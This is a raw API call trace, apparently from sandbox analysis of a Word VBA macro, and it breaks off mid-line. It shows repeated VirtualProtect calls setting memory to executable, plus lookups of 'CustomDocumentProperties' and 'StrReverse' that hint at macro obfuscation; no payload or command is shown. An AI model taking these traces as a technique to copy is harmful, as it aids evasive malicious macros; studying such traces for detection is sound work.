1 [0113.403] GetCurrentProcess () returned 0xffffffff [0113.403] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120f4, dwSize=0x14) returned 1 [0113.403] VirtualProtect (in: lpAddress=0xc9120f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.403] GetCurrentProcess () returned 0xffffffff [0113.404] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120f5, dwSize=0x2) returned 1 [0113.404] GetCurrentProcess () returned 0xffffffff [0113.404] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912114, dwSize=0x14) returned 1 [0113.404] VirtualProtect (in: lpAddress=0xc912114, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.404] GetCurrentProcess () returned 0xffffffff [0113.404] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912115, dwSize=0x2) returned 1 [0113.404] GetCurrentProcess () returned 0xffffffff [0113.404] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912134, dwSize=0x14) returned 1 [0113.404] VirtualProtect (in: lpAddress=0xc912134, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.405] GetCurrentProcess () returned 0xffffffff [0113.405] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912135, dwSize=0x2) returned 1 [0113.405] GetCurrentProcess () returned 0xffffffff [0113.405] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912154, dwSize=0x14) returned 1 [0113.405] VirtualProtect (in: lpAddress=0xc912154, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.405] GetCurrentProcess () returned 0xffffffff [0113.405] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912155, dwSize=0x2) returned 1 [0113.405] GetCurrentProcess () returned 0xffffffff [0113.405] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912174, dwSize=0x14) returned 1 [0113.405] VirtualProtect (in: lpAddress=0xc912174, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.406] GetCurrentProcess () returned 0xffffffff [0113.406] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912175, dwSize=0x2) returned 1 [0113.406] GetCurrentProcess () returned 0xffffffff [0113.406] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912194, dwSize=0x14) returned 1 [0113.406] VirtualProtect (in: lpAddress=0xc912194, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.406] GetCurrentProcess () returned 0xffffffff [0113.406] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912195, dwSize=0x2) returned 1 [0113.406] GetCurrentProcess () returned 0xffffffff [0113.406] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121b4, dwSize=0x14) returned 1 [0113.406] VirtualProtect (in: lpAddress=0xc9121b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.407] GetCurrentProcess () returned 0xffffffff [0113.407] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121b5, dwSize=0x2) returned 1 [0113.407] GetCurrentProcess () returned 0xffffffff [0113.407] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121d4, dwSize=0x14) returned 1 [0113.407] VirtualProtect (in: lpAddress=0xc9121d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.407] GetCurrentProcess () returned 0xffffffff [0113.407] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121d5, dwSize=0x2) returned 1 [0113.407] GetCurrentProcess () returned 0xffffffff [0113.407] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc898, dwSize=0x14) returned 1 [0113.407] VirtualProtect (in: lpAddress=0xcadc898, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.408] GetCurrentProcess () returned 0xffffffff [0113.408] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc899, dwSize=0x2) returned 1 [0113.408] GetCurrentProcess () returned 0xffffffff [0113.408] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8b8, dwSize=0x14) returned 1 [0113.408] VirtualProtect (in: lpAddress=0xcadc8b8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.409] GetCurrentProcess () returned 0xffffffff [0113.409] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8b9, dwSize=0x2) returned 1 [0113.409] GetCurrentProcess () returned 0xffffffff [0113.409] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8d8, dwSize=0x14) returned 1 [0113.409] VirtualProtect (in: lpAddress=0xcadc8d8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.410] GetCurrentProcess () returned 0xffffffff [0113.410] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8d9, dwSize=0x2) returned 1 [0113.410] GetCurrentProcess () returned 0xffffffff [0113.410] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8f8, dwSize=0x14) returned 1 [0113.410] VirtualProtect (in: lpAddress=0xcadc8f8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.410] GetCurrentProcess () returned 0xffffffff [0113.410] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8f9, dwSize=0x2) returned 1 [0113.410] GetCurrentProcess () returned 0xffffffff [0113.410] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc918, dwSize=0x14) returned 1 [0113.411] VirtualProtect (in: lpAddress=0xcadc918, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.411] GetCurrentProcess () returned 0xffffffff [0113.411] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc919, dwSize=0x2) returned 1 [0113.411] GetCurrentProcess () returned 0xffffffff [0113.411] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc938, dwSize=0x14) returned 1 [0113.411] VirtualProtect (in: lpAddress=0xcadc938, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.412] GetCurrentProcess () returned 0xffffffff [0113.412] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc939, dwSize=0x2) returned 1 [0113.412] GetCurrentProcess () returned 0xffffffff [0113.412] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc958, dwSize=0x14) returned 1 [0113.412] VirtualProtect (in: lpAddress=0xcadc958, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.412] GetCurrentProcess () returned 0xffffffff [0113.412] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc959, dwSize=0x2) returned 1 [0113.412] GetCurrentProcess () returned 0xffffffff [0113.412] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc978, dwSize=0x14) returned 1 [0113.412] VirtualProtect (in: lpAddress=0xcadc978, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.413] GetCurrentProcess () returned 0xffffffff [0113.413] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc979, dwSize=0x2) returned 1 [0113.413] GetCurrentProcess () returned 0xffffffff [0113.413] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc998, dwSize=0x14) returned 1 [0113.413] VirtualProtect (in: lpAddress=0xcadc998, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.413] GetCurrentProcess () returned 0xffffffff [0113.413] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc999, dwSize=0x2) returned 1 [0113.413] GetCurrentProcess () returned 0xffffffff [0113.413] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9b8, dwSize=0x14) returned 1 [0113.413] VirtualProtect (in: lpAddress=0xcadc9b8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.414] GetCurrentProcess () returned 0xffffffff [0113.414] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9b9, dwSize=0x2) returned 1 [0113.414] GetCurrentProcess () returned 0xffffffff [0113.414] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9d8, dwSize=0x14) returned 1 [0113.414] VirtualProtect (in: lpAddress=0xcadc9d8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.414] GetCurrentProcess () returned 0xffffffff [0113.414] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9d9, dwSize=0x2) returned 1 [0113.414] GetCurrentProcess () returned 0xffffffff [0113.415] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9f8, dwSize=0x14) returned 1 [0113.415] VirtualProtect (in: lpAddress=0xcadc9f8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.415] GetCurrentProcess () returned 0xffffffff [0113.415] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9f9, dwSize=0x2) returned 1 [0113.415] GetCurrentProcess () returned 0xffffffff [0113.415] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca18, dwSize=0x14) returned 1 [0113.415] VirtualProtect (in: lpAddress=0xcadca18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.416] GetCurrentProcess () returned 0xffffffff [0113.416] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca19, dwSize=0x2) returned 1 [0113.416] GetCurrentProcess () returned 0xffffffff [0113.416] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca38, dwSize=0x14) returned 1 [0113.416] VirtualProtect (in: lpAddress=0xcadca38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.416] GetCurrentProcess () returned 0xffffffff [0113.416] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca39, dwSize=0x2) returned 1 [0113.416] GetCurrentProcess () returned 0xffffffff [0113.416] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca58, dwSize=0x14) returned 1 [0113.416] VirtualProtect (in: lpAddress=0xcadca58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.417] GetCurrentProcess () returned 0xffffffff [0113.417] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca59, dwSize=0x2) returned 1 [0113.417] GetCurrentProcess () returned 0xffffffff [0113.417] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca78, dwSize=0x14) returned 1 [0113.417] VirtualProtect (in: lpAddress=0xcadca78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.417] GetCurrentProcess () returned 0xffffffff [0113.417] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca79, dwSize=0x2) returned 1 [0113.417] GetCurrentProcess () returned 0xffffffff [0113.417] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb0e0, dwSize=0x14) returned 1 [0113.418] VirtualProtect (in: lpAddress=0xcadb0e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.418] GetCurrentProcess () returned 0xffffffff [0113.418] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb0e1, dwSize=0x2) returned 1 [0113.418] GetCurrentProcess () returned 0xffffffff [0113.418] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb100, dwSize=0x14) returned 1 [0113.418] VirtualProtect (in: lpAddress=0xcadb100, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.419] GetCurrentProcess () returned 0xffffffff [0113.419] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb101, dwSize=0x2) returned 1 [0113.419] GetCurrentProcess () returned 0xffffffff [0113.419] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb120, dwSize=0x14) returned 1 [0113.419] VirtualProtect (in: lpAddress=0xcadb120, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.419] GetCurrentProcess () returned 0xffffffff [0113.419] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb121, dwSize=0x2) returned 1 [0113.420] GetAsyncKeyState (vKey=3) returned 0 [0113.420] CRetailMalloc_Alloc () returned 0xcb00898 [0113.420] memcpy (in: _Dst=0xb754f48, _Src=0x197888, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.421] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11302cda, cbMultiByte=15, lpWideCharStr=0x1976a4, cchWideChar=16 | out: lpWideCharStr="ActiveDocument") returned 15 [0113.421] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c038a, cbMultiByte=15, lpWideCharStr=0x197704, cchWideChar=16 | out: lpWideCharStr="ActiveDocument") returned 15 [0113.421] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c038a, cbMultiByte=15, lpWideCharStr=0x197704, cchWideChar=16 | out: lpWideCharStr="ActiveDocument") returned 15 [0113.427] CRetailMalloc_Alloc () returned 0xc846e30 [0113.427] CRetailMalloc_Realloc () returned 0xca9f390 [0113.427] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c038a, cbMultiByte=15, lpWideCharStr=0x1976c4, cchWideChar=16 | out: lpWideCharStr="ActiveDocument") returned 15 [0113.428] CRetailMalloc_Realloc () returned 0xc899a28 [0113.429] CRetailMalloc_Realloc () returned 0xcadbdb8 [0113.430] memcpy (in: _Dst=0xb754f4c, _Src=0x197888, _Size=0x4 | out: _Dst=0xb754f4c) returned 0xb754f4c [0113.430] CRetailMalloc_Alloc () returned 0xc842ff0 [0113.430] CRetailMalloc_Realloc () returned 0xcad1598 [0113.430] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c08ce, cbMultiByte=25, lpWideCharStr=0x1976dc, cchWideChar=26 | out: lpWideCharStr="CustomDocumentProperties") returned 25 [0113.430] CRetailMalloc_Realloc () returned 0xf5eac90 [0113.431] memcpy (in: _Dst=0xb754f48, _Src=0x197888, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.431] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11302d06, cbMultiByte=11, lpWideCharStr=0x1976a4, cchWideChar=12 | out: lpWideCharStr="StrReverse") returned 11 [0113.431] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c08a6, cbMultiByte=11, lpWideCharStr=0x197704, cchWideChar=12 | out: lpWideCharStr="StrReverse") returned 11 [0113.443] CRetailMalloc_Realloc () returned 0xf5e9058 [0113.443] CRetailMalloc_Realloc () returned 0xb3b5f30 [0113.443] CRetailMalloc_Realloc () returned 0xf5c7508 [0113.443] memcpy (in: _Dst=0xb754f48, _Src=0x197888, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.443] CRetailMalloc_Realloc () returned 0xcad9f88 [0113.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x6980ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0113.444] CRetailMalloc_Realloc () returned 0xcafff40 [0113.444] memcpy (in: _Dst=0xcb008f8, _Src=0x197924, _Size=0x18 | out: _Dst=0xcb008f8) returned 0xcb008f8 [0113.444] CRetailMalloc_Realloc () returned 0xcb00898 [0113.444] CRetailMalloc_Free () returned 0x1 [0113.444] GetCurrentProcess () returned 0xffffffff [0113.444] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912074, dwSize=0x14) returned 1 [0113.444] VirtualProtect (in: lpAddress=0xc912074, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0113.445] GetCurrentProcess () returned 0xffffffff [0113.445] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912075, dwSize=0x2) returned 1 [0113.445] GetCurrentProcess () returned 0xffffffff [0113.445] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912094, dwSize=0x14) returned 1 [0113.445] VirtualProtect (in: lpAddress=0xc912094, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0113.445] GetCurrentProcess () returned 0xffffffff [0113.446] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912095, dwSize=0x2) returned 1 [0113.446] GetCurrentProcess () returned 0xffffffff [0113.446] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120b4, dwSize=0x14) returned 1 [0113.446] VirtualProtect (in: lpAddress=0xc9120b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0113.446] GetCurrentProcess () returned 0xffffffff [0113.446] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120b5, dwSize=0x2) returned 1 [0113.446] GetCurrentProcess () returned 0xffffffff [0113.446] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120d4, dwSize=0x14) returned 1 [0113.446] VirtualProtect (in: lpAddress=0xc9120d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0113.447] GetCurrentProcess () returned 0xffffffff [0113.447] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120d5, dwSize=0x2) returned 1 [0113.447] GetCurrentProcess () returned 0xffffffff [0113.447] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120f4, dwSize=0x14) returned 1 [0113.447] VirtualProtect (in: lpAddress=0xc9120f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0113.447] GetCurrentProcess () returned 0xffffffff [0113.447] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120f5, dwSize=0x2) returned 1 [0113.447] GetCurrentProcess () returned 0xffffffff [0113.447] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912114, dwSize=0x14) returned 1 [0113.447] VirtualProtect (in: lpAddress=0xc912114, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0113.448] GetCurrentProcess () returned 0xffffffff [0113.448] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912115, dwSize=0x2) returned 1 [0113.448] GetCurrentProcess () returned 0xffffffff [0113.448] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912134, dwSize=0x14) returned 1 [0113.448] VirtualProtect (in: lpAddress=0xc912134, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0113.448] GetCurrentProcess () returned 0xffffffff [0113.448] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912135, dwSize=0x2) returned 1 [0113.448] GetCurrentProcess () returned 0xffffffff [0113.448] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912154, dwSize=0x14) returned 1 [0113.448] VirtualProtect (in: lpAddress=0xc912154, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0113.449] GetCurrentProcess () returned 0xffffffff [0113.449] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912155, dwSize=0x2) returned 1 [0113.449] GetCurrentProcess () returned 0xffffffff [0113.449] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912174, dwSize=0x14) returned 1 [0113.449] VirtualProtect (in: lpAddress=0xc912174, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0113.449] GetCurrentProcess () returned 0xffffffff [0113.449] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912175, dwSize=0x2) returned 1 [0113.449] GetCurrentProcess () returned 0xffffffff [0113.449] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912194, dwSize=0x14) returned 1 [0113.449] VirtualProtect (in: lpAddress=0xc912194, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0113.450] GetCurrentProcess () returned 0xffffffff [0113.450] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912195, dwSize=0x2) returned 1 [0113.450] GetCurrentProcess () returned 0xffffffff [0113.450] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121b4, dwSize=0x14) returned 1 [0113.450] VirtualProtect (in: lpAddress=0xc9121b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0113.450] GetCurrentProcess () returned 0xffffffff [0113.450] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121b5, dwSize=0x2) returned 1 [0113.450] GetCurrentProcess () returned 0xffffffff [0113.450] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121d4, dwSize=0x14) returned 1 [0113.450] VirtualProtect (in: lpAddress=0xc9121d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0113.451] GetCurrentProcess () returned 0xffffffff [0113.451] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121d5, dwSize=0x2) returned 1 [0113.451] GetCurrentProcess () returned 0xffffffff [0113.451] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc898, dwSize=0x14) returned 1 [0113.451] VirtualProtect (in: lpAddress=0xcadc898, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0113.451] GetCurrentProcess () returned 0xffffffff [0113.451] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc899, dwSize=0x2) returned 1 [0113.451] GetCurrentProcess () returned 0xffffffff [0113.451] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8b8, dwSize=0x14) returned 1 [0113.451] VirtualProtect (in: lpAddress=0xcadc8b8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0113.452] GetCurrentProcess () returned 0xffffffff [0113.452] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8b9, dwSize=0x2) returned 1 [0113.452] GetCurrentProcess () returned 0xffffffff [0113.452] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8d8, dwSize=0x14) returned 1 [0113.452] VirtualProtect (in: lpAddress=0xcadc8d8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0113.453] GetCurrentProcess () returned 0xffffffff [0113.453] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8d9, dwSize=0x2) returned 1 [0113.453] GetCurrentProcess () returned 0xffffffff [0113.453] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8f8, dwSize=0x14) returned 1 [0113.453] VirtualProtect (in: lpAddress=0xcadc8f8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0113.453] GetCurrentProcess () returned 0xffffffff [0113.453] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8f9, dwSize=0x2) returned 1 [0113.453] GetCurrentProcess () returned 0xffffffff [0113.453] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc918, dwSize=0x14) returned 1 [0113.453] VirtualProtect (in: lpAddress=0xcadc918, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0113.454] GetCurrentProcess () returned 0xffffffff [0113.454] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc919, dwSize=0x2) returned 1 [0113.454] GetCurrentProcess () returned 0xffffffff [0113.454] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc938, dwSize=0x14) returned 1 [0113.454] VirtualProtect (in: lpAddress=0xcadc938, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0113.454] GetCurrentProcess () returned 0xffffffff [0113.454] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc939, dwSize=0x2) returned 1 [0113.454] GetCurrentProcess () returned 0xffffffff [0113.454] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc958, dwSize=0x14) returned 1 [0113.454] VirtualProtect (in: lpAddress=0xcadc958, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0113.455] GetCurrentProcess () returned 0xffffffff [0113.455] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc959, dwSize=0x2) returned 1 [0113.455] GetCurrentProcess () returned 0xffffffff [0113.455] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc978, dwSize=0x14) returned 1 [0113.455] VirtualProtect (in: lpAddress=0xcadc978, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0113.456] GetCurrentProcess () returned 0xffffffff [0113.456] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc979, dwSize=0x2) returned 1 [0113.456] GetCurrentProcess () returned 0xffffffff [0113.456] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc998, dwSize=0x14) returned 1 [0113.456] VirtualProtect (in: lpAddress=0xcadc998, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0113.457] GetCurrentProcess () returned 0xffffffff [0113.457] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc999, dwSize=0x2) returned 1 [0113.457] GetCurrentProcess () returned 0xffffffff [0113.457] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9b8, dwSize=0x14) returned 1 [0113.457] VirtualProtect (in: lpAddress=0xcadc9b8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0113.457] GetCurrentProcess () returned 0xffffffff [0113.457] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9b9, dwSize=0x2) returned 1 [0113.457] GetCurrentProcess () returned 0xffffffff [0113.457] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9d8, dwSize=0x14) returned 1 [0113.457] VirtualProtect (in: lpAddress=0xcadc9d8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0113.458] GetCurrentProcess () returned 0xffffffff [0113.458] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9d9, dwSize=0x2) returned 1 [0113.458] GetCurrentProcess () returned 0xffffffff [0113.458] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9f8, dwSize=0x14) returned 1 [0113.458] VirtualProtect (in: lpAddress=0xcadc9f8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0113.459] GetCurrentProcess () returned 